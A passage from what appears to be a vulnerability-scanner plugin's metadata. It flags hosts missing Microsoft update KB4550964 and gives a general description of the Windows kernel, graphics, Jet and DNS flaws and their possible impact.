script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4550964\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present\n on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exists due to\n\n - An error when the Windows kernel improperly handles objects in memory.\n\n - Multiple errors in the way Microsoft Graphics Components handle objects in\n memory.\n\n - Multiple errors when the Windows Jet Database Engine improperly handles\n objects in memory.\n\n - An error in Windows DNS when it fails to properly handle queries.\n\n Please see the references for more information about the vulnerabilities.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation allows an attacker\n to execute arbitrary code on a victim system, disclose sensitive information,\n conduct denial-of-service condition and gain elevated privileges.\");\n\n script_tag(name:\"affected\", value:\"- Microsoft Windows